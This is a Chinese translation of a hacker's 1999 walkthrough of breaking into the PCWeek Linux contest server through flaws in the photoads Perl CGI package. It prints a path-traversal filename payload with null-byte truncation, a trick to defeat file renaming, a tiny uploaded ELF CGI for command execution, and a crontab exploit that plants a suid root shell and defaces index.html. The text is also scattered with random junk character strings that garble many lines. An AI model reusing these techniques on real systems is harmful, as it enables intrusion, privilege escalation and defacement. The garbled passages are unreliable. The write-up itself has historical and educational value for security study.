JFS侵入PCWEEK-LINUX主機(jī)的詳細(xì)過程

譯者注：PCWeek-Linux 主機(jī)是著名電腦雜志 PCWeek 為了測試 WEB 服務(wù)器 IIS（NT平臺）
/ s, ?" F7 \- |; H+ t和 Apache（Linux平臺）的安全性，提供給黑客/駭客攻擊的兩臺主機(jī)之一。另一臺主機(jī)安裝
的是 IIS（NT平臺）。詳細(xì)情況請?jiān)L問網(wǎng)站：http://www.hackpcweek.com/。

( f9 a& Y8 z' n2 [$ W6 [. y; D; b
首先要進(jìn)行的當(dāng)然是——收集遠(yuǎn)端主機(jī)信息：打開的端口和提供的網(wǎng)絡(luò)服務(wù)等。經(jīng)過掃
描后發(fā)現(xiàn)大多數(shù)端口都被過濾掉了，原因可能是安裝了防火墻或設(shè)置了 TCP-Wrapper 。所
以我們只能從 HTTP 服務(wù)器著手了。
: c9 x1 y1 v2 z/ B
8 x+ C0 ?3 m/ s! c% S" b2 Ilemming:~# telnet securelinux.hackpcweek.com 80
Trying 208.184.64.170...
Connected to securelinux.hackpcweek.com.
  Z' y: v$ t( [  lEscape character is '^]'.
POST X HTTP/1.0

HTTP/1.1 400 Bad Request
# [. Y/ Z8 \$ A: N: A4 x3 TDate: Fri, 24 Sep 1999 23:42:15 GMT
- N7 p& v. n' f4 oServer: Apache/1.3.6 (Unix) (Red Hat/Linux)
# D3 E( m* j+ A+ ^# q- o(...)
8 q+ c2 R# T5 L- X% D9 v7 wConnection closed by foreign host.
lemming:~#

8 I7 q2 @# b% z; }2 t  s  H嗯，服務(wù)器操作系統(tǒng)是 Red Hat，WEB服務(wù)器是 Apache/1.3.6。從網(wǎng)頁上可知服務(wù)器安
裝了 mod_perl，但只有一個(gè) fingerprint 功能，對我們沒有什么用處。
$ {4 O: a+ k9 S% \: DApache 1.3.6 本身沒有包含任何可供遠(yuǎn)端用戶使用的CGI程序，但我們不清楚Red Hat
% X5 a; u" p9 `9 ?的發(fā)行版本中是否有，所以我們進(jìn)行了一些測試（test-cgi, wwwboard, count.cgi等）。
結(jié)果令人失望。于是我們嘗試找出網(wǎng)站的結(jié)構(gòu)。經(jīng)過對該網(wǎng)站HTML頁的分析，終于找出
了網(wǎng)站DocumentRoot下的目錄結(jié)構(gòu)：

/
/cgi-bin
7 P( l% c6 r+ `, G/photoads/
/photoads/cgi-bin
- q* ~0 Q, _, Z
- A/ w% A4 ^5 \9 p, S. D! \, J* j/ [) ?很自然地，我們的眼光落在 photoads 這個(gè)安裝模塊上。該商用CGI包可在"http://
www.hoffoce.com"找到，價(jià)格為$149，包括供檢查和修改用的PERL源代碼。
我們找到一個(gè)朋友，了解和掌握 photoads 在 Linux 平臺上的安裝情況，從而大致清楚
2 b2 q! w/ Q( F5 g運(yùn)行在該主機(jī)上的 photoads。
7 U$ J* d: J5 V% H+ r% W! T檢查了缺省安裝的文件后，我們發(fā)現(xiàn)可以取得所有用戶名及其口令的數(shù)據(jù)庫（http://
4 @# b6 c- u' Z4 q4 vsecurelinux.hackpcweek.com/photoads/ads_data.pl），但當(dāng)我們試圖訪問配置文件
7 t$ I6 U) M2 S/photoads/cgi-bin/photo_cfg.pl 時(shí)，服務(wù)器的設(shè)置拒絕了這個(gè)請求。
通過 /photoads/cgi-bin/env.cgi，我們可以知道該服務(wù)器的許多詳細(xì)情況，如
$ x  f( P( C2 z! D3 D+ aDocumentRoot 在文件系統(tǒng)的位置（/home/httpd/html），運(yùn)行 Apache 服務(wù)器的用戶（
/ }+ `6 P, Y. knobody）等。
現(xiàn)在，開始尋找漏洞的第一步，我們嘗試尋找是否存在 SSI 或 mod_perl 嵌入 HTML
命令的漏洞，如：

' Y8 [+ k& r$ t2 ?& ?+ _<!--#include file="..."--> for SSI
<!--#perl ...--> for mod_perl

但腳本中的匹配表達(dá)式卻在許多輸入域上過濾此類輸入。不過與此同時(shí)我們卻發(fā)現(xiàn)有一
9 I$ z, r, B( E  l/ {* X, e個(gè)用戶賦值的變量在轉(zhuǎn)換成 HTML 代碼前，并沒有檢查其值的合法性。我們可以通過它將命
5 c2 F( @: j5 V: `令嵌入到由服務(wù)器端解析的 HTML 代碼中：
5 a0 X7 d: T6 K( y2 o
9 W8 N- ]8 O/ O在 post.cgi，行 36：
; A+ k9 d  m# ]. |  Wprint "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";
7 a5 P7 O# x6 U& ~
5 ~; K) R2 x! x* w# b( Y$ENV{'HTTP_REFERER'}是一個(gè)用戶賦值的變量，我們可以通過它將任何 HTML 嵌入到代
. |& z5 c2 G$ }$ q) J* d" v碼中。
請閱讀我們提供的文件 getit.ssi 和 getit.mod_perl。
. Z3 u# B  D1 R在命令行下使用這些文件如下：

lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80

. g0 a8 M4 B3 p) W5 V; Z3 Q但不幸的是，該主機(jī)的配置并不允許 SSI 或 mod_perl，所以我們無法利用這個(gè)方法侵
入系統(tǒng)。
  i  ]* ~& Q& H, L
3 Y3 N9 k% o8 l3 N0 Q% b/ C因此我們決定在CGI腳本中尋找缺口。在PERL腳本中許多漏洞往往出現(xiàn)在 open()、
! U: d4 Y$ S' k0 Qsystem() 或 `` 等調(diào)用中，前一個(gè)允許讀/寫/執(zhí)行，而后兩個(gè)允許執(zhí)行。
$ i6 q4 E( V. C5 c雖然在該主機(jī)找不到后兩種調(diào)用，但我們卻發(fā)現(xiàn)了一些 open() 調(diào)用：
+ y9 E- U/ g" Z1 v6 e$ B
, A& a) \, @1 N/ [$ l3 k# Jlemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more
/ N; |+ D: b1 M# |  o# e
4 l7 }; |  }2 i$ y4 Gadvisory.cgi: open (DATA, "$BaseDir/$DataFile");
edit.cgi: open (DATA, ">$BaseDir/$DataFile");
' \; k6 o* v3 }! Zedit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
& F- f  O$ `- {. V' X- |photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
photo.cgi: open ( FILE, $filename );
(...)

$BaseDir 和 $DataFile 兩個(gè)變量是在配置文件中定義，且不能在運(yùn)行時(shí)修改，無法被
我們利用。
但其余兩個(gè)就……
. @5 }; g+ P( w0 Z6 U! W8 v  D
在 photo.cgi，行 132：
$write_file = $Upload_Dir.$filename;

  \4 p) Y6 O4 D* B( S5 \open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
" w9 I6 G7 D3 S; w% L4 d' Oprint ULFD $UPLOAD{'FILE_CONTENT'};
5 m/ f" I* v  r* ~4 i# k/ tclose(ULFD);

因此，如果我們可以修改 $write_file 變量，就可以寫文件系統(tǒng)中的任何文件。
+ ^; U( ~2 c( Y1 n( a9 E7 k$write_file 變量來自：

$write_file = $Upload_Dir.$filename;
7 K. f) e; i0 s: U% R1 e0 h- f2 Y
其中，$Upload_Dir 在配置文件中定義，我們無法修改，但 $filename 變量又如何呢？
+ o- \+ b' Z6 `# E4 l+ m# A* w
/ Z9 c& ?+ v! ^1 j  ~0 n在 photo.cgi，行 226：
+ l& {- \' f6 r7 H: Oif( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }
1 R/ u. ?. |9 G' g5 N0 ]
" e- F4 T7 Z4 a; D" W$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

if ($filename =~ m/gif/) {
0 t3 ~; ]/ n, }* n: {% Y$type = '.gif';
& W* Y) E! K, f  m  ^8 T}elsif ($filename =~ m/jpg/) {
$type = '.jpg';
}else{
{&Not_Valid_Image}
! \( R, z6 P7 t* a9 \/ S( r}
9 ]4 s- X3 T. i, a
( \1 \0 {' P$ K7 Q$ G# m6 }由此可知，該變量來自從提交表格的變量組分解出來的 $UPLOAD{'FILE_NAME'}，而且必
須經(jīng)過匹配表達(dá)式過濾，因此我們不能用"../../../../../../../../etc/passwd"格式來取
得任何文件。匹配表達(dá)式為：

$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

我們看到，如 $filename 與該表達(dá)式匹配，則返回ASCII碼1（SOH）。同時(shí)，變量還必
須包含"gif"或"jpg"，以通過 Not_Valid_Image 過濾器。
' n9 x* ^% r: C! P  a/ |經(jīng)過多次嘗試，以及從 Phrack 的關(guān)于PERL CGI安全性文章的幫助，我們發(fā)現(xiàn)以下格式
5 u; }! A, @. [3 i7 _7 I# ]
* p" m. |+ b: u5 H/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif

, q: D9 m& L) j  o可以成功修改WEB服務(wù)器根目錄下的index.html文件。:-)
9 J, L3 I# }& y9 J7 r  B然而，為了上載文件，我們?nèi)皂毨@過更多的腳本代碼。我們發(fā)現(xiàn)無法通過POST方法發(fā)送
# Q  G# C- n: l' H2 @, k包含上述內(nèi)容的表格（無法轉(zhuǎn)換%00），唯一的方法只能是GET。
在 photo.cgi ，行 256，會(huì)檢查被上載文件的內(nèi)容是否符合圖像定義（寬/長/大?。?font class="jammer">3 s# K2 l' w! T  E  _& K) s
（記住，photo.cgi 是被當(dāng)作某個(gè)AD上載圖像的一個(gè)方法）。如果不符合這些細(xì)節(jié)，腳本將
, G. W! z7 X% Y( f2 @刪除該上載文件。這當(dāng)然不是我們所希望的！
( Y& X4 [/ q4 B8 F/ cPCWeek 網(wǎng)站配置文件將 Imagesize 設(shè)為 0，所以我們可以忽略該腳本中有關(guān)JPG部分，
2 R) T7 w8 {& k, I% @  D4 ~而將主要精力集中在GIF上。
! ?7 t. F* G- E' ^; O  {
" |+ M/ J4 G: A0 Vif ( substr ( $filename, -4, 4 ) eq ".gif" ) {
open ( FILE, $filename );
; J5 `9 `+ \: ^' B' A- J, nmy $head;
  @& l- F1 i; u; M/ \* Rmy $gHeadFmt = "A6vvb8CC";
& r6 ~# o  }3 }% F( [my $pictDescFmt = "vvvvb8";
' c9 y- m, a& Zread FILE, $head, 13;
7 l! U9 f* r; N* {(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
3 ~3 p. Q9 ~. t( P9 h& Lclose FILE;
! W3 {' J. [9 L$ _; Y$PhotoWidth = $width;
' j- T( K  J( _& p/ A' S- q1 c. B2 \$PhotoHeight = $height;
$PhotoSize = $size;
0 u- o1 h: h# s0 _# Hreturn;
}

( }, k! b8 t& Z- |在 photo.cgi，行 140：
+ s1 t$ p4 ?9 s7 o, Y# Z& x8 z
if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
& X* x4 E( v5 D! x{&Not_Valid_Image}
}

if ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
+ L2 h& ^0 h+ e}
2 r, i' A. _, G
由上可知，$PhotoWidth不能大于700，不能為空，且不能大于 $ImgWidth（缺省為350）
。
, b9 Q8 d( J9 C* Y7 c) M所以我們使 $PhotoWidth!="" 且 $Photowidth<350 即可。
對于 $PhotoHeight，則必須小于 $ImgHeight（缺省為250）。
綜合以上要求，我們可以得到一個(gè)可以使用的數(shù)據(jù)：$PhotoWidth==$PhotoHeight==0。
, A9 E  k  _! J! f+ x' C1 {/ Q: O0 Y; D研究提取該值的腳本后，我們唯一要做的就是將文件的第6至第9字節(jié)的值置為 ASCII 碼 0
2 ?& l% d0 Q, a0 e8 D, |（NUL）。
' {: f3 s; A& M6 l$ U在確保 FILE_CONTENT（文件內(nèi)容）符合以上所有要求后，我們又在以下代碼遇到了另一
& t. i  n+ T4 O* M; j4 ^個(gè)問題：
/ U! T! K/ I) ~
chmod 0755, $Upload_Dir.$filename;
2 Z5 K1 D4 w: b) f+ i& M% f$newname = $AdNum;
rename("$write_file", "$Upload_Dir/$newname");

Show_Upload_Success($write_file);

哇！文件將被改名/移動(dòng)（這可是我們絕對不希望的?。?。
2 U/ y) y! D- K& Z! d查找 $AdNum 變量的最終處理過程，我們發(fā)現(xiàn)它只能包含數(shù)字：
/ H" m3 O7 S8 s" M& c: Z/ @5 t" T
$UPLOAD{'AdNum'} =~ tr/0-9//cd;
. P6 r1 t  w3 U% ]$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
9 G5 ]" V. H0 }: C# E  j' M1 o$AdNum = $UPLOAD{'AdNum'};

. ^/ {4 W9 H7 N其余的字符將被刪除。因此我們不能直接應(yīng)用"../../../"這種方法。
那么，應(yīng)該怎樣做呢？我們看到 rename() 函數(shù)需要兩個(gè)參數(shù)：舊的路徑和新的路徑。
哈哈，在函數(shù)過程中沒有錯(cuò)誤檢查！當(dāng)函數(shù)出錯(cuò)后將跳到下一行繼續(xù)執(zhí)行！那么如何才能使
該函數(shù)失敗呢？Linux 內(nèi)核對文件名長度限制為1024字節(jié)。因此如能使腳本將文件改名時(shí)新
文件名超過1024字節(jié)長，即可繞過這個(gè)過濾器。
所以，下一步就是要向系統(tǒng)傳遞一個(gè)大約1024字節(jié)長的AD號碼。但由于腳本僅允許我們
: V2 q; g1 X% l1 c0 W  F發(fā)送對應(yīng)AD號碼已存在的圖片，而且由系統(tǒng)產(chǎn)生一個(gè)10^1024（10的1024次冪，即小數(shù)點(diǎn)前有
1024個(gè)數(shù)字——backend注）的AD號碼要花的時(shí)間對我們來說似乎太長了。;-)
; Z5 s/ v" ~2 S7 t* N+ S我們又遇到另一個(gè)難題了！……

我們發(fā)現(xiàn)輸入錯(cuò)誤檢查函數(shù)可以幫助我們創(chuàng)建一個(gè)指定的AD號碼！瀏覽 edit.cgi 腳本
后，你也許就會(huì)想到：如果輸入是一個(gè)文件名+回車符+一個(gè)1024位的數(shù)字，會(huì)產(chǎn)生什么結(jié)果
' [/ m' M& ?2 o1 _7 p呢？;-)
請閱讀用于創(chuàng)建新AD值的程序文件 long.adnum。
當(dāng)成功繞過 $AdNum 的檢查后，我們就可以讓腳本創(chuàng)建/覆蓋用戶 nobody 有權(quán)寫的任何
; N5 {0 R, Q7 |8 P3 b4 Q文件，其中包含了我們所希望的東西（GIF頭部的NUL除外）。
$ p! ]" Z' h& P+ V  }; ]
# A* M1 }& L* C! W4 C# W# g現(xiàn)在就讓我們對該主機(jī)試一試這個(gè)方法。
嗯，so far so good（一切順利）。但當(dāng)我們試圖讓腳本改寫 index.html 文件時(shí)無法
成功。:( 其中的原因可能是沒有覆蓋該文件的權(quán)限（該文件由root擁有）。


) ?: J+ [& z) W3 Q* I- H9 e6 k3 |8 y讓我們試一下是否還有其它入侵方法……
; S, i% S3 u7 I7 R
; B! S4 s# V! s7 G1 @0 w我們決定嘗試修改CGI程序，以使其按我們的意愿運(yùn)行:)。這種方法還可以讓我們搜尋那
7 V& r( h& m* B" z些“絕密”文件，然后拿出動(dòng)賣。:)
3 n( Z7 t& _2 Q# E6 M2 q+ \1 |我們修改了“覆蓋”腳本，并讓其成功地覆蓋了一個(gè)CGI！:) 為了不覆蓋那些較為重要
$ t, L$ ?# L# M$ {的CGI（這是提高隱蔽性的聰明法子——backend注），最后我們選擇了 advisory.cgi（你知
道它有什么用嗎？:)）
現(xiàn)在，我們將要上載一個(gè)shell腳本，以便我們可以執(zhí)行一些命令。呵呵
2 K/ c4 D$ ?8 E/ l, H( M然而，這個(gè)以CGI方式運(yùn)行的shell腳本必須符合以下格式：
0 F  B8 c8 B* l7 S& N6 f6 P( w8 U/ A( P
#!/bin/sh
( J8 O! }5 l+ W* Uecho "Content-type: text/html"
  g' u% I6 H, T! S0 Jfind / "*secret*" -print
3 J* y- f* s) ]2 m( _
3 @" X& `3 ]/ z- J+ I" g同時(shí)要記得，第6至第9字節(jié)必須為0或很小的值，以符合上面提及的大小定義……
; |* ?  \$ \$ E: X) u- D
+ j) L* \- P0 ^+ i- _8 i' z#!/bi\00\00\00\00n/sh

以上這種方法是行不通的，內(nèi)核只會(huì)讀取前5個(gè)字節(jié)（#!/bi）內(nèi)容并執(zhí)行。在該主機(jī)中
我們無法只用三個(gè)字節(jié)去獲得一個(gè)shell。又遇到難題了！:(
' v. y4 c& W" F/ V/ B8 p
# r) E$ b) ~$ {: n/ u! F讓我們看一下ELF（Linux缺省可執(zhí)行類型）二進(jìn)制文件格式，就會(huì)發(fā)現(xiàn)那些位置字節(jié)的
7 ]; ^& Q& \: z+ T. q$ d' P3 Z內(nèi)容均為0x00。:) Yohoo :)
解決了這個(gè)問題后，現(xiàn)在我們需要將這個(gè)ELF可執(zhí)行文件上載到遠(yuǎn)端服務(wù)器中。注意，文
( e8 W  e. m" i7 y# |- ^, ^5 i0 B% B件內(nèi)容必須經(jīng)過編碼，因?yàn)槲覀円阎乐荒芡ㄟ^GET方法上載，而不是POST。因此還要考慮到
1 g' }, x$ g1 b1 R. {4 rURI的最大長度。Apache 服務(wù)器上URI最大長度設(shè)為8190字節(jié)。別忘了，我們還有一個(gè)很長的
* l4 r# V& h2 H/ t# v1024字節(jié)的AD號碼，所以經(jīng)編碼后的ELF文件長度限制為大約7000字節(jié)。
  d+ e) f3 ~6 b0 \' F. z6 q; _
' v- J7 L; S! O& u6 |3 F以下這個(gè)程序：

" z$ }4 d3 x: u/ y# B/ T# Elemming:~/pcweek/hack/POST# cat fin.c
#include <stdio.h>
2 A( T% {6 t' @9 ^  Nmain()
. `# s) w6 V/ [9 o  l! @5 L* f# n* a{
0 Q. \$ j6 a$ p) sprintf("Content-type: text/html\n\n\r");
fflush(stdout);
" S. k8 a+ g/ m& H; \4 J2 wexeclp("/usr/bin/find","find","/",0);
: k: s/ q) n4 {, r0 {}
3 y! D" K. A% ]7 ~9 }  L
編譯后：
" k6 z8 W/ G* z( C7 d: B
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*

% f; ?! T: s* t# K6 \( ?8 |( h優(yōu)化（清除symbols）后：

lemming:~/pcweek/hack/POST# strip fin
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
lemming:~/pcweek/hack/POST#
$ j: j" n: E+ `3 o% K
: o" i' Y0 K! R) gURL編碼后：
9 _( Z% C, \* @" J
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
( e  R* T" y+ {; }. ?7 clemming:~/pcweek/hack/POST# ls -l fin.url
* d4 `) R. c& C$ S1 E+ U! [-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url

這個(gè)文件大小超過了限制值。:(
我們只能自行編輯二進(jìn)制文件以盡量減小文件體積。這可不是一件輕松的工作，但卻有
效：
% `- R6 s0 R. b: ], y8 {
lemming:~/pcweek/hack/POST# joe fin
( ^6 k- T6 }8 q- f* S/ Ulemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
lemming:~/pcweek/hack/POST#

請閱讀 get.sec.find文件，還有 to_url 腳本和用來運(yùn)行一些基本命令的*.c文件。
: R& D  S( l+ t+ {( E5 }
現(xiàn)在，將這個(gè)CGI上載到服務(wù)器，再用瀏覽器訪問它，如：

3 L; J. l2 }1 Iwget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi

) C/ a+ K. d7 B# c4 H服務(wù)器返回的結(jié)果相當(dāng)于在服務(wù)器上執(zhí)行 find / 命令。:)
! b8 B9 K$ P6 @" }; D- ?. Y但我們在該服務(wù)器中找不到任何“絕密”文件，或許是nobody用戶無權(quán)訪問的緣故。:(
) V, ^  n" O8 y! c  [我們嘗試了更多的命令搜索，如ls等，但仍無法找到它們的蹤影。
[我懷疑這些文件是否真的保存在該服務(wù)器上！]
3 N1 {( \- v$ [) R9 @

- Y) S0 V" C( z2 T& D好了，現(xiàn)在是獲取 root 權(quán)限的時(shí)候了。利用最新發(fā)現(xiàn)的 Red Hat crontab 漏洞就可以
6 f7 n5 Y" l% V1 a輕松做到這一點(diǎn)。該漏洞詳情請參閱 Bugtraq 或 securityfocus 上相關(guān)文檔。
我們修改了源程序以適應(yīng)自己的需要，因?yàn)槲覀儾恍杞换ナ?root shell，而是創(chuàng)建一個(gè)
用戶 nobody 可訪問的 suid root shell，如 /tmp/.bs。我們再次上載該CGI，并運(yùn)行它，
) |9 U2 G6 y9 R- h5 X* e+ w觀察其運(yùn)行結(jié)果。
我們制作了執(zhí)行"ls /tmp"命令的CGI，執(zhí)行后確認(rèn)我們已擁有了一個(gè) suid root shell。
另外，我們還上載了一個(gè)文件 /tmp/xx，用于修改 index.html 文件。
6 e' d/ A0 L* c9 s& U+ z8 O
6 r! e9 T7 _* `3 p# Y8 iexeclp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);

9 f" ~4 g0 ]* K+ y" R4 s好了。游戲結(jié)束！:)
" i& S+ S* U% N$ ?總共花費(fèi)了大約20個(gè)小時(shí)，還算不錯(cuò)！呵呵。:)